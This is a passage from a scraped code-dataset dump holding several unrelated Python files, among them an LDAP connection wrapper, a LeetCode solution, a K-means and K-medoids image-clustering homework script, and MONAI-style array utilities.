None for a must to flush data into list\n# args_new[1]: source type index\n# args_new[2]: company code number\n# args_new[2]: empty time start\n# args_new[3]: empty time end\n # import pdb; pdb.set_trace()\n # args_new = copy.deepcopy(args)\n args_new = [arg for arg in args]\n args_new.append(self.web_data_not_found_time_start)\n args_new.append(self.web_data_not_found_time_end)\n self.web_data_not_found_time_start = self.web_data_not_found_time_end = None\n self.__add_record(\"WebDataNotFound\", *args_new)\n","sub_path":"depreated_libs/common/common_class.py","file_name":"common_class.py","file_ext":"py","file_size_in_byte":50388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563097407","text":"# encoding = utf-8\n\nimport ldap\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger('ldap_server.backend.base')\nlogger.setLevel(logging.INFO)\n\nclass InvalidCredentials(Exception):\n pass\n\nclass ServerDown(Exception):\n pass\n\nclass DatabaseCursor(object):\n def __init__(self, ldap_connection):\n self.connection = ldap_connection\n\nclass LdapDatabase(object):\n def __init__(self, settings_dict):\n self.settings_dict = settings_dict\n self.charset = \"utf-8\"\n self.connection = None\n self._cursor()\n\n def _cursor(self):\n if self.connection is None:\n try:\n logger.debug('Connecting to LDAP at %s with account %s' %(self.settings_dict['NAME'], self.settings_dict['USER']))\n \n if self.settings_dict['CACERT']:\n logger.debug('Using CACERT: %s' % self.settings_dict['CACERT'])\n ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, self.settings_dict['CACERT'])\n\n self.connection = ldap.initialize(self.settings_dict['NAME'])\n\n if self.settings_dict['STARTTLS']:\n logger.debug('Using STARTTLS')\n self.connection.start_tls_s()\n\n self.connection.simple_bind_s(\n self.settings_dict['USER'],\n self.settings_dict['PASSWORD'])\n\n except ldap.SERVER_DOWN:\n logger.error('LDAP server is down')\n raise ServerDown\n\n except ldap.INVALID_CREDENTIALS:\n logger.error('Invalid credentials')\n raise InvalidCredentials\n \n return DatabaseCursor(self.connection)\n\n def add_s(self, dn, modlist):\n logger.info('Adding entry \\'%s\\'' % dn)\n cursor = self._cursor()\n return cursor.connection.add_s(dn.encode(self.charset), modlist)\n\n def delete_s(self, dn):\n logger.info('Deleting entry \\'%s\\'' % dn)\n cursor = self._cursor()\n return cursor.connection.delete_s(dn.encode(self.charset))\n\n def modify_s(self, dn, modlist):\n logger.info('Modifying entry \\'%s\\'' % dn)\n if modlist:\n logger.debug('Modifying attributes: %s' % ', '.join([mod[1] for mod in modlist]))\n\n cursor = self._cursor()\n return cursor.connection.modify_s(dn.encode(self.charset), modlist)\n\n def rename_s(self, dn, newrdn):\n logger.info('Renaming entry \\'%s\\' to \\'%s\\'' % (dn, newrdn))\n cursor = self._cursor()\n return cursor.connection.rename_s(dn.encode(self.charset), newrdn.encode(self.charset))\n\n def search_s(self, base, scope, filterstr='(objectClass=*)', attrlist=None):\n logger.debug('Searching entries...')\n logger.debug('Base: %s' % base)\n logger.debug('Filter: %s' % filterstr)\n \n if attrlist:\n logger.debug('Attributes: %s' % ', '.join(attrlist))\n\n cursor = self._cursor()\n results = cursor.connection.search_s(base, scope, filterstr.encode(self.charset), attrlist)\n output = []\n for dn, attrs in results:\n output.append((dn.decode(self.charset), attrs))\n return output\n\n def whoami(self):\n return 
self.settings_dict['USER']\n","sub_path":"ldap_server/backend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641607624","text":"class Solution(object):\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n def search(left, right, target, range):\n if left > right:\n return -1\n\n mid = left + (right - left) // 2\n\n if nums[mid] > target:\n search(left, mid - 1, target, range)\n elif nums[mid] < target:\n search(mid + 1, right, target, range)\n else:\n # equal\n if mid < range[0]:\n range[0] = mid\n search(left, mid - 1, target, range)\n if mid > range[1]:\n range[1] = mid\n search(mid + 1, right, target, range)\n\n range = [len(nums), -1]\n search(0, len(nums) - 1, target, range)\n\n if range[0] == len(nums):\n return [-1, -1]\n\n return range\n\n\n","sub_path":"34 Search For a Range.py","file_name":"34 Search For a Range.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482624831","text":"#Name : problemthree.py\r\n#Author : Min Khant Htoo(17S23) of Pioneer JC\r\n#DOC : 9/05/2017\r\n#Last updated : \r\n#Description :\r\n\r\ndef main():\r\n print(\"### ###\")\r\n infile = open(\"records.txt\",\"r\")\r\n xlist = []\r\n ylist = []\r\n print(\"X\")\r\n for line in infile:\r\n x,y = line[:-1].split(\",\")\r\n xlist.append(x)\r\n ylist.append(y)\r\n print(\"X\")\r\n input()\r\n infile.close()\r\n z = int(0)\r\n for i in range(len(xlist)):\r\n z = z + ((int(xlist[i])**2) - (int(ylist[i])**2))\r\n print(\"X\")\r\n print(\"|{0:^7}|{1:^7}|\".format(\"x\",\"y\"))\r\n for i in range(len(xlist)):\r\n print(\"|{0:^7}|{1:^7}|\".format(xlist[i],ylist[i]))\r\n print(\"z = {0}\".format(z))\r\n print(\"X\")\r\n \r\n input(\"Press Any Key to continue ...\")\r\n print(\"### Program Ending ... 
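# --- illustrative sketch, not part of the scraped file above ---
# The searchRange solution above narrows both ends of the run of equal
# values with a recursive binary search. The standard-library bisect module
# yields the same [first, last] pair iteratively, the usual idiomatic form:
from bisect import bisect_left, bisect_right

def search_range(nums, target):
    lo = bisect_left(nums, target)
    if lo == len(nums) or nums[lo] != target:
        return [-1, -1]
    return [lo, bisect_right(nums, target) - 1]

assert search_range([5, 7, 7, 8, 8, 10], 8) == [3, 4]
assert search_range([5, 7, 7, 8, 8, 10], 6) == [-1, -1]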
###\")\r\n\r\nmain()\r\n\r\n","sub_path":"Computing J1/Programming Exercise 3/problemthree.py","file_name":"problemthree.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"175423194","text":"import numpy as np\nimport imageio\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nimport time\n\n\n'''\nK-Means Implementation and Functions\n---------------------------------------\n'''\ndef distance3d(pixel, cluster):\n\tpixel = pixel.astype(float)\n\tcluster = cluster.astype(float)\n\treturn (pixel[0] - cluster[0])**2 + (pixel[1] - cluster[1])**2 + (pixel[2] - cluster[2])**2\n\n\ndef assignclusters(pixels, clusters):\n\tassignments = np.zeros((pixels.shape[0], 1), np.int)\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, clusters.shape[0]):\n\t\t\tcluster = clusters[j][:]\n\t\t\tdistance = distance3d(pixel, cluster)\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments[i] = assign\n\tgroups = np.linspace(0, clusters.shape[0] - 1, num=clusters.shape[0], dtype=np.int)\n\tmask = np.isin(groups, np.unique(assignments))\n\t# Check for empty clusters and randomly assign to keep algorithm running (for large # of clusters)\n\tif np.isin(False,mask):\n\t\tprint(\"Some empty clusters found, random sampling new points for cluster\")\n\t\tfor i in range(0, mask.shape[0]):\n\t\t\tif mask[i] == False:\n\t\t\t\tselections = np.random.randint(0, assignments.shape[0], 1)\n\t\t\t\tassignments[selections] = i\n\treturn assignments\n\n\ndef centeradjustment(assignments, pixels, K):\n\tpixel_locations = np.concatenate((assignments, pixels), axis=1)\n\t# sort rows by cluster id while keeping each assignment paired with its pixel row\n\tpixel_locations = pixel_locations[pixel_locations[:, 0].argsort()]\n\tcluster_sum = np.zeros((K,3), np.int)\n\tcluster_num = 0\n\tcluster_count = 0\n\tfor i in range(0, pixel_locations.shape[0]):\n\t\tif pixel_locations[i][0] > cluster_count:\n\t\t\tcluster_sum[cluster_count] = cluster_sum[cluster_count] / cluster_num\n\t\t\tcluster_count = cluster_count + 1\n\t\t\tcluster_num = 0\n\t\tcluster_num = cluster_num + 1\n\t\tcluster_sum[cluster_count] = cluster_sum[cluster_count] + pixel_locations[i][1:4]\n\tcluster_sum[-1] = cluster_sum[-1] / cluster_num # last group\n\tclusters = cluster_sum\n\treturn clusters\n\n\ndef mykmeans(pixels, K):\n\tcentroids_ind = np.random.randint(0, pixels.shape[0], (K, 1)) # initialize as random index location\n\tcentroids = pixels[centroids_ind.squeeze()]\n\tsteps = 100\n\tcnt = 1\n\tepsilon = 1e-1\n\tconverged = False\n\tprint(\"Clustering iterations for K-Means are beginning...\")\n\twhile not converged:\n\t\t# CLUSTER ASSIGNMENT\n\t\tclasses = assignclusters(pixels, centroids)\n\t\tcentroids_last = centroids\n\t\t# CLUSTER ADJUSTMENT\n\t\tcentroids = centeradjustment(classes, pixels, K)\n\t\tif (cnt % 10 == 0 or cnt == 1):\n\t\t\tprint(\"K-means Iteration #{}\".format(cnt))\n\t\t\tprint(\"Centroid clusters: \\n {}\".format(centroids))\n\t\tcnt = cnt + 1\n\t\tif np.linalg.norm(centroids-centroids_last, axis=0).sum() < epsilon:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Means Converged after {} iterations\".format(cnt))\n\t\telif cnt >= steps:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Means Stopped after reaching max {} iterations\".format(cnt))\n\t\telse:\n\t\t\tpass\n\treturn classes, centroids\n\n\n'''\nK-Medoid Implementation and Functions\n---------------------------------------\n'''\ndef distance_function(pixel, 
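# --- illustrative sketch, not part of the scraped file above ---
# assignclusters above compares every pixel with every centroid in a Python
# double loop. NumPy broadcasting collapses that to a single argmin over an
# (n_pixels, n_clusters) table of squared distances - same assignments, no
# explicit loops:
import numpy as np

def assign_vectorized(pixels, centroids):
    diff = pixels[:, None, :].astype(float) - centroids[None, :, :].astype(float)
    return np.argmin((diff ** 2).sum(axis=2), axis=1)

px = np.array([[0, 0, 0], [10, 10, 10], [9, 9, 9]])
cs = np.array([[0, 0, 0], [10, 10, 10]])
assert assign_vectorized(px, cs).tolist() == [0, 1, 1]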
cluster, option):\n\tpixel = pixel.astype(float)\n\tcluster = cluster.astype(float)\n\tif option == 0: # euclidean\n\t\tdistance = (pixel[0] - cluster[0]) ** 2 + (pixel[1] - cluster[1]) ** 2 + (pixel[2] - cluster[2]) ** 2\n\telif option == 1: # L1\n\t\tdistance = abs(pixel[0] - cluster[0]) + abs(pixel[1] - cluster[1]) + abs(pixel[2] - cluster[2])\n\telse:\n\t\tdistance = 0\n\treturn distance\n\n\ndef kmed_assignclusters(pixels, clusters, K, option):\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\t# option = 0\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, K):\n\t\t\tcluster = clusters[j][:]\n\t\t\t# distance = distance3d(pixel, cluster) #TODO: change distance function\n\t\t\tdistance = distance_function(pixel, cluster, option)\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments_r[i][assign] = 1\n\n\treturn assignments_r\n\n\ndef distance_matrix(pixels):\n\tprint(\"Calculating Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tPt = np.transpose(P)\n\tq=np.linalg.norm(P, axis=1)\n\tD = q + np.transpose(q) - 2*np.matmul(P,Pt)\n\tprint(\"Distance matrix calculated!\")\n\treturn D\n\n\ndef distance_matrix_manhattan(pixels):\n\tprint(\"Calculating Manhattan Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tDj = np.zeros((P.shape[0], P.shape[0], 3))\n\tq = np.linalg.norm(P,axis=1)\n\tfor j in range(0,3):\n\t\tPj = P[:, j]\n\t\tPjt = np.transpose(Pj)\n\t\tq = np.square(Pj)\n\t\tqt = np.transpose(q)\n\t\tDj[:,:,j] = q + qt - 2*np.matmul(Pj, Pjt)\n\n\tD = np.sum(Dj, axis=2)\n\tprint(\"Distance Manhattan matrix calculated!\")\n\n\treturn D\n\n\ndef distance_matrix_chebychev(pixels):\n\tprint(\"Calculating Chebychev Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tDj = np.zeros((P.shape[0], P.shape[0], 3))\n\tq = np.linalg.norm(P,axis=1)\n\tfor j in range(0,3):\n\t\tPj = P[:, j]\n\t\tPjt = np.transpose(Pj)\n\t\tq = np.square(Pj)\n\t\tqt = np.transpose(q)\n\t\tDj[:,:,j] = q + qt - 2*np.matmul(Pj, Pjt)\n\n\tD = np.max(Dj, axis=2)\n\tprint(\"Distance Chebychev matrix calculated!\")\n\treturn D\n\n\ndef kmed_assignclusters_matrix(pixels, centroids_ind, K, D):\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, K):\n\t\t\tind = centroids_ind[j][:]\n\t\t\tdistance = D[i, j]\n\t\t\t# distance = # find in distance matrix\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments_r[i][assign] = 1\n\n\t# groups = np.linspace(0, K - 1, num=K, dtype=np.int)\n\t# mask = np.isin(groups, np.unique(assignments_r))\n\t# # Check for empty clusters and randomly assign to keep algorithm running (for large # of clusters)\n\t# if np.isin(False, mask):\n\t# \tprint(\"Some empty clusters found, random sampling new points for cluster\")\n\t# \tfor i in range(0, mask.shape[0]):\n\t# \t\tif mask[i] == False:\n\t# \t\t\tselections = np.random.randint(0, assignments_r.shape[0], 1)\n\t# \t\t\tassignments_r[selections] = i\n\n\treturn assignments_r\n\n\ndef kmed_findcentroid_matrix(cluster_pixels, pixels, D):\n\tbest_centroid = 0\n\tbest_distancesum = float(\"inf\")\n\tdistancesum = 0.0\n\tfor i in range(0,cluster_pixels.shape[0]):\n\t\t# print(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, 
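# --- editor's note: illustrative sketch, not part of the original dataset record ---
# distance_matrix above adds plain row norms (q) rather than squared norms, so
# it does not realize the identity ||x-y||^2 = ||x||^2 + ||y||^2 - 2*x.y. A
# vectorized squared-Euclidean distance matrix would look like this sketch:
def squared_distance_matrix(P):
    P = P.astype(float)
    sq = np.sum(P ** 2, axis=1)                      # ||x_i||^2 per row
    D = sq[:, None] + sq[None, :] - 2.0 * (P @ P.T)  # broadcast the identity
    return np.maximum(D, 0.0)                        # clamp tiny negative rounding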
cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistancesum = 0.0\n\t\tfor j in range(0, cluster_pixels.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = D[i,j]\n\t\t\t\tdistancesum = distancesum + distance\n\t\tif distancesum < best_distancesum:\n\t\t\tbest_distancesum = distancesum\n\t\t\tbest_centroid = i\n\n\treturn best_centroid\n\n\ndef kmed_findcentroid(cluster_pixels, pixels):\n\tbest_centroid = 0\n\tbest_distancesum = float(\"inf\")\n\tdistancesum = 0.0\n\tfor i in range(0,cluster_pixels.shape[0]):\n\t\tprint(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistancesum = 0.0\n\t\tfor j in range(0, cluster_pixels.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = distance_function(pixel_sel.squeeze(), pixels[cluster_pixels[j]].squeeze(), option=1)\n\t\t\t\tdistancesum = distancesum + distance\n\t\tif distancesum < best_distancesum:\n\t\t\tbest_distancesum = distancesum\n\t\t\tbest_centroid = i\n\n\treturn best_centroid\n\n\ndef kmed_L2centroid(cluster_pixels, pixels):\n\tbest_centroid = 0\n\tbest_distance = float(\"inf\")\n\tmean = pixels[cluster_pixels].mean(axis=0)\n\tfor i in range(0, cluster_pixels.shape[0]):\n\t\t# print(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistance = distance_function(pixel_sel.squeeze(), mean.squeeze(), option=0)\n\t\tif distance < best_distance:\n\t\t\tbest_distance = distance\n\t\t\tbest_centroid = cluster_pixels[i].squeeze()\n\treturn best_centroid\n\n\ndef kmed_updateclusters(assign_r, pixels, K):\n\tcluster_inds = np.zeros((K,1), np.int)\n\tclusters = pixels[cluster_inds.squeeze()]\n\tfor i in range(0,K):\n\t\tpixel_ind = np.transpose(np.nonzero(assign_r[:, i]))\n\t\tquick = True\n\t\tif quick: # using knowledge of L2 norm for faster solution\n\t\t\tcluster_ind = kmed_L2centroid(pixel_ind, pixels)\n\t\telse:\n\t\t\tcluster_ind = kmed_findcentroid(pixel_ind, pixels)\n\t\tcluster_inds[i] = cluster_ind\n\n\tclusters = pixels[cluster_inds.squeeze()]\n\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\twhile ind.shape[0] < clusters.shape[0]:\n\t\tfor i in range(0, clusters.shape[0]):\n\t\t\tif i not in ind:\n\t\t\t\tclusters[i] = pixels[np.random.randint(0, pixels.shape[0])]\n\t\t\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\treturn clusters\n\n\ndef kmed_updateclusters_matrix(assign_r, pixels, K, D):\n\tcluster_inds = np.zeros((K,1), np.int)\n\tclusters = pixels[cluster_inds.squeeze()]\n\tfor i in range(0,K):\n\t\tpixel_ind = np.transpose(np.nonzero(assign_r[:, i]))\n\t\tcluster_ind = kmed_findcentroid_matrix(pixel_ind, pixels, D)\n\t\tcluster_inds[i] = cluster_ind\n\n\tclusters = pixels[cluster_inds.squeeze()]\n\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\twhile ind.shape[0] < clusters.shape[0]:\n\t\tfor i in range(0, clusters.shape[0]):\n\t\t\tif i not in ind:\n\t\t\t\tclusters[i] = pixels[np.random.randint(0, pixels.shape[0])]\n\t\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\treturn clusters\n\n\ndef mykmedoids(pixels, K, option=0):\n\t'''\n\tK-Mediod Options:\n\t0: Quick L2 norm implementation\n\t1: Slow L2 (TODO)\n\t2: Matrix Math L2 (TODO)\n\t'''\n\tcentroids_ind = np.random.randint(0, pixels.shape[0], (K, 1)) # initialize as random index location\n\n\tcentroids = 
pixels[centroids_ind.squeeze()]\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\n\t# if matrix option, calculate D matrix\n\tif option == 2:\n\t\tD = distance_matrix(pixels)\n\telif option == 3:\n\t\tD = distance_matrix_manhattan(pixels)\n\telif option == 4:\n\t\tD = distance_matrix_chebychev(pixels)\n\tsteps = 100\n\tcnt = 1\n\tepsilon = 1e-1\n\tconverged = False\n\tprint(\"Clustering iterations for K-Medoids are beginning...\")\n\twhile not converged:\n\t\t# CLUSTER ASSIGNMENT\n\t\tif option==2 or option == 3 or option == 4:\n\t\t\tassignments_r = kmed_assignclusters_matrix(pixels, centroids_ind, K, D)\n\t\telse:\n\t\t\tassignments_r = kmed_assignclusters(pixels, centroids, K, option)\n\t\tcentroids_last = centroids\n\t\t# CLUSTER ADJUSTMENT\n\t\tif option==2 or option == 3 or option == 4:\n\t\t\tcentroids = kmed_updateclusters_matrix(assignments_r, pixels, K, D)\n\t\telse:\n\t\t\tcentroids = kmed_updateclusters(assignments_r, pixels, K)\n\n\t\tif (cnt % 10 == 0 or cnt == 1):\n\t\t\tprint(\"K-Mediods Iteration #{}\".format(cnt))\n\t\t\tprint(\"Centroid clusters: \\n {}\".format(centroids))\n\t\tcnt = cnt + 1\n\t\tarray, locations = np.where(assignments_r == 1)\n\t\tclasses = locations.reshape((locations.shape[0], 1))\n\t\tif np.linalg.norm(centroids-centroids_last, axis=0).sum() < epsilon:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Mediods Converged after {} iterations\".format(cnt))\n\t\telif cnt >= steps:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Mediods Stopped after reaching max {} iterations\".format(cnt))\n\t\telse:\n\t\t\tpass\n\treturn classes, centroids\n\n\ndef main():\n\n\tif(len(sys.argv) < 2):\n\t\tprint(\"Please supply an image file\")\n\t\treturn\n\n\timage_file_name = sys.argv[1]\n\tK = 5 if len(sys.argv) == 2 else int(sys.argv[2])\n\tprint(image_file_name, K)\n\tim = np.asarray(imageio.imread(image_file_name))\n\n\tplt.imshow(im)\n\n\tfig, axs = plt.subplots(1, 2)\n\n\tim_vector = im.copy()\n\tim_vector.resize((im.shape[0]*im.shape[1], im.shape[2])) # added\n\n\tt1 = time.time()\n\tprint(\"Starting K-medoids Clustering\")\n\tclasses, centers = mykmedoids(im_vector, K, option=0) # Options: 0: L2 quick, 2: Matrix L2, 3: Matrix L1, 4: Matrix Linf\n\tprint(classes, centers)\n\tnew_im = np.asarray(centers[classes].reshape(im.shape), im.dtype)\n\timageio.imwrite(os.path.basename(os.path.splitext(image_file_name)[0]) + '_converted_mykmedoids_' + str(K) + os.path.splitext(image_file_name)[1], new_im)\n\taxs[0].imshow(new_im)\n\taxs[0].set_title('K-medoids')\n\tt2 = time.time()\n\tkmed_time = (t2-t1)\n\n\tt1 = time.time()\n\tprint(\"Starting K-means Clustering\")\n\tclasses, centers = mykmeans(im_vector, K)\n\tprint(classes, centers)\n\tnew_im = np.asarray(centers[classes].reshape(im.shape), im.dtype)\n\timageio.imwrite(os.path.basename(os.path.splitext(image_file_name)[0]) + '_converted_mykmeans_' + str(K) + os.path.splitext(image_file_name)[1], new_im)\n\taxs[1].imshow(new_im)\n\taxs[1].set_title('K-means')\n\tt2 = time.time()\n\tkmean_time = (t2-t1)\n\n\tplt.show()\n\n\tprint(\"Total times\\n K-mediods: {} s \\n K-Means: {} s\".format(kmed_time, kmean_time))\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"K-Medoids/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":12485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255598013","text":"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance 
with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport random\n\nimport numpy as np\n\n\ndef rand_choice(prob=0.5):\n \"\"\"Returns True if a randomly chosen number is less than or equal to `prob', by default this is a 50/50 chance.\"\"\"\n return random.random() <= prob\n\n\ndef img_bounds(img):\n \"\"\"Returns the minimum and maximum indices of non-zero lines in axis 0 of `img', followed by that for axis 1.\"\"\"\n ax0 = np.any(img, axis=0)\n ax1 = np.any(img, axis=1)\n return np.concatenate((np.where(ax0)[0][[0, -1]], np.where(ax1)[0][[0, -1]]))\n\n\ndef in_bounds(x, y, margin, maxx, maxy):\n \"\"\"Returns True if (x,y) is within the rectangle (margin,margin,maxx-margin,maxy-margin).\"\"\"\n return margin <= x < (maxx - margin) and margin <= y < (maxy - margin)\n\n\ndef is_empty(img):\n \"\"\"Returns True if `img' is empty, that is its maximum value is not greater than its minimum.\"\"\"\n return not (img.max() > img.min()) # use > instead of <= so that an image full of NaNs will result in True\n\n\ndef ensure_tuple_size(tup, dim):\n \"\"\"Returns a copy of `tup' with `dim' values by either shortened or padded with zeros as necessary.\"\"\"\n tup = tuple(tup) + (0,) * dim\n return tup[:dim]\n\n\ndef zero_margins(img, margin):\n \"\"\"Returns True if the values within `margin' indices of the edges of `img' in dimensions 1 and 2 are 0.\"\"\"\n if np.any(img[:, :, :margin]) or np.any(img[:, :, -margin:]):\n return False\n\n if np.any(img[:, :margin, :]) or np.any(img[:, -margin:, :]):\n return False\n\n return True\n\n\ndef rescale_array(arr, minv=0.0, maxv=1.0, dtype=np.float32):\n \"\"\"Rescale the values of numpy array `arr' to be from `minv' to `maxv'.\"\"\"\n if dtype is not None:\n arr = arr.astype(dtype)\n\n mina = np.min(arr)\n maxa = np.max(arr)\n\n if mina == maxa:\n return arr * minv\n\n norm = (arr - mina) / (maxa - mina) # normalize the array first\n return (norm * (maxv - minv)) + minv # rescale by minv and maxv, which is the normalized array by default\n\n\ndef rescale_instance_array(arr, minv=0.0, maxv=1.0, dtype=np.float32):\n \"\"\"Rescale each array slice along the first dimension of `arr' independently.\"\"\"\n out = np.zeros(arr.shape, dtype)\n for i in range(arr.shape[0]):\n out[i] = rescale_array(arr[i], minv, maxv, dtype)\n\n return out\n\n\ndef rescale_array_int_max(arr, dtype=np.uint16):\n \"\"\"Rescale the array `arr' to be between the minimum and maximum values of the type `dtype'.\"\"\"\n info = np.iinfo(dtype)\n return rescale_array(arr, info.min, info.max).astype(dtype)\n\n\ndef copypaste_arrays(src, dest, srccenter, destcenter, dims):\n \"\"\"\n Calculate the slices to copy a sliced area of array `src' into array `dest'. The area has dimensions `dims' (use 0\n or None to copy everything in that dimension), the source area is centered at `srccenter' index in `src' and copied\n into area centered at `destcenter' in `dest'. The dimensions of the copied area will be clipped to fit within the\n source and destination arrays so a smaller area may be copied than expected. 
Return value is the tuples of slice\n objects indexing the copied area in `src', and those indexing the copy area in `dest'.\n\n Example:\n src=np.random.randint(0,10,(6,6))\n dest=np.zeros_like(src)\n srcslices,destslices=copypasteArrays(src,dest,(3,2),(2,1),(3,4))\n dest[destslices]=src[srcslices]\n print(src)\n print(dest)\n\n >>> [[9 5 6 6 9 6]\n [4 3 5 6 1 2]\n [0 7 3 2 4 1]\n [3 0 0 1 5 1]\n [9 4 7 1 8 2]\n [6 6 5 8 6 7]]\n [[0 0 0 0 0 0]\n [7 3 2 4 0 0]\n [0 0 1 5 0 0]\n [4 7 1 8 0 0]\n [0 0 0 0 0 0]\n [0 0 0 0 0 0]]\n \"\"\"\n srcslices = [slice(None)] * src.ndim\n destslices = [slice(None)] * dest.ndim\n\n for i, ss, ds, sc, dc, dim in zip(range(src.ndim), src.shape, dest.shape, srccenter, destcenter, dims):\n if dim:\n # dimension before midpoint, clip to size fitting in both arrays\n d1 = np.clip(dim // 2, 0, min(sc, dc))\n # dimension after midpoint, clip to size fitting in both arrays\n d2 = np.clip(dim // 2 + 1, 0, min(ss - sc, ds - dc))\n\n srcslices[i] = slice(sc - d1, sc + d2)\n destslices[i] = slice(dc - d1, dc + d2)\n\n return tuple(srcslices), tuple(destslices)\n\n\ndef resize_center(img, *resize_dims, fill_value=0):\n \"\"\"\n Resize `img' by cropping or expanding the image from the center. The `resizeDims' values are the output dimensions\n (or None to use original dimension of `img'). If a dimension is smaller than that of `img' then the result will be\n cropped and if larger padded with zeros, in both cases this is done relative to the center of `img'. The result is\n a new image with the specified dimensions and values from `img' copied into its center.\n \"\"\"\n resize_dims = tuple(resize_dims[i] or img.shape[i] for i in range(len(resize_dims)))\n\n dest = np.full(resize_dims, fill_value, img.dtype)\n half_img_shape = np.asarray(img.shape) // 2\n half_dest_shape = np.asarray(dest.shape) // 2\n\n srcslices, destslices = copypaste_arrays(img, dest, half_img_shape, half_dest_shape, resize_dims)\n dest[destslices] = img[srcslices]\n\n return dest\n\n\ndef one_hot(labels, num_classes):\n \"\"\"\n Converts label image `labels' to a one-hot vector with `num_classes' number of channels as last dimension.\n \"\"\"\n labels = labels % num_classes\n y = np.eye(num_classes)\n onehot = y[labels.flatten()]\n\n return onehot.reshape(tuple(labels.shape) + (num_classes,)).astype(labels.dtype)\n","sub_path":"monai/transforms/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"317586421","text":"from adminworkstation.models import Path\n\n# add by wangshibin 20190725\ndef DBuptdate_find_data(path_id):\n # 获取详细信息\n res = Path.objects.filter(path_id=path_id)\n line_type = res[0].path_linetype\n content = res[0].path_content\n trade_type = res[0].path_tradetype\n trade_path = res[0].path_tradepath\n remark = res[0].path_remark\n state = res[0].path_approval_state\n return line_type, content, trade_type, trade_path, remark, state\n","sub_path":"DBoperation/DBuser/DBuptdate_find_data.py","file_name":"DBuptdate_find_data.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292993283","text":"# -*- coding: utf-8 -*-\n''' Curse of Dimensionality Example \n\nPlot the average distance between points and fraction of points close to the\nedge of a unit hypercube in varying dimensional space \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport 
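# --- editor's note: illustrative usage sketch, not part of the original dataset record ---
# one_hot above works by indexing an identity matrix with the flattened labels
# and then restoring the spatial shape with the class axis appended last:
labels = np.array([[0, 1], [2, 1]])
encoded = np.eye(3)[labels.flatten()].reshape(labels.shape + (3,))
# encoded[0, 1] -> [0., 1., 0.]   (class 1 at position (0, 1))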
